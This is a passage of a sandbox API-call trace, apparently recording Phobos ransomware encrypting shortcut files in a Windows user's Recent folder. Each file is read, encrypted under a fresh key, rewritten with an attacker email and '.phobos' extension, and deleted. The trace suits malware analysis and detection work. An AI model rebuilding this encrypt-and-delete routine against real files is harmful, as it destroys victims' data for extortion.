halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0fkeaiwh1k-ezlz_8.lnk")) returned 1 [0199.786] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.786] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.788] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=6708) returned 1 [0199.788] CloseHandle (hObject=0x124) returned 1 [0199.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk")) returned 0x20 [0199.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.788] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.789] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.789] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.790] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.790] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.790] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1a34, lpOverlapped=0x0) returned 1 [0199.792] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a40, dwBufLen=0x1a40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1a40) returned 1 [0199.792] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1a40, lpOverlapped=0x0) returned 1 [0199.793] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32aa8) returned 1 [0199.793] CryptSetKeyParam (hKey=0xa32aa8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.793] CryptEncrypt (in: hKey=0xa32aa8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.793] CryptDestroyKey (hKey=0xa32aa8) returned 1 [0199.793] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.793] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.793] CloseHandle (hObject=0x124) returned 1 [0199.793] CloseHandle (hObject=0x174) returned 1 [0199.793] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\0o-e7mR20i.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\0o-e7mr20i.lnk")) returned 1 [0199.794] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.795] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0199.796] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2500) returned 1 [0199.796] CloseHandle (hObject=0xb0) returned 1 [0199.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk")) returned 0x20 [0199.796] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0199.796] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.796] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.796] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.798] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0199.798] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.798] ReadFile (in: hFile=0xb0, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x9c4, lpOverlapped=0x0) returned 1 [0199.799] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9d0, dwBufLen=0x9d0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x9d0) returned 1 [0199.799] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x9d0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x9d0, lpOverlapped=0x0) returned 1 [0199.800] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0199.800] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.800] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0199.800] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.800] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0199.800] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.800] CloseHandle (hObject=0xb0) returned 1 [0199.800] CloseHandle (hObject=0x174) returned 1 [0199.800] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1siv16eVBt7Y-.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1siv16evbt7y-.lnk")) returned 1 [0199.802] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.802] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.803] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=4009) returned 1 [0199.803] CloseHandle (hObject=0x174) returned 1 [0199.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk")) returned 0x20 [0199.803] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.804] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.804] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0199.805] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ca8) returned 1 [0199.805] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.805] ReadFile (in: hFile=0x174, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xfa9, lpOverlapped=0x0) returned 1 [0199.806] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfb0, dwBufLen=0xfb0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xfb0) returned 1 [0199.806] WriteFile (in: hFile=0xb0, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xfb0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xfb0, lpOverlapped=0x0) returned 1 [0199.807] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32a28) returned 1 [0199.807] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.807] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.808] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.808] WriteFile (in: hFile=0xb0, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.808] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0199.808] CloseHandle (hObject=0x174) returned 1 [0199.808] CloseHandle (hObject=0xb0) returned 1 [0199.808] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\1X6Tb_ump.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\1x6tb_ump.lnk")) returned 1 [0199.809] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.809] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.811] GetFileSizeEx (in: hFile=0x174, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5165) returned 1 [0199.811] CloseHandle (hObject=0x174) returned 1 [0199.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk")) returned 0x20 [0199.811] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.811] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.811] SetFilePointerEx (in: hFile=0x174, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.812] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.812] ReadFile (in: hFile=0x174, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x142d, lpOverlapped=0x0) returned 1 [0199.934] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1430, dwBufLen=0x1430 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1430) returned 1 [0199.934] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1430, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1430, lpOverlapped=0x0) returned 1 [0199.935] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.935] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.935] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.935] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.935] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.935] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.935] CloseHandle (hObject=0x174) returned 1 [0199.935] CloseHandle (hObject=0x124) returned 1 [0199.935] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\2oU_3.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\2ou_3.lnk")) returned 1 [0199.936] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0199.936] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.937] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5184) returned 1 [0199.937] CloseHandle (hObject=0x124) returned 1 [0199.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk")) returned 0x20 [0199.937] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0199.938] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.938] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0199.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\6opkb6.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0199.939] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0199.939] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.939] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1440, lpOverlapped=0x0) returned 1 [0199.942] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1450, dwBufLen=0x1450 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1450) returned 1 [0199.942] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1450, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1450, lpOverlapped=0x0) returned 1 [0199.944] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0199.944] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0199.944] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0199.944] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.944] WriteFile (in: hFile=0x174, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0199.944] CryptDestroyKey (hKey=0xa32a28) returned 1 [0199.944] CloseHandle (hObject=0x124) returned 1 [0199.944] CloseHandle (hObject=0x174) returned 1 [0199.944] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\6opKb6.lnk" (normalized: "c:\\users\\5p5nrgjn0js 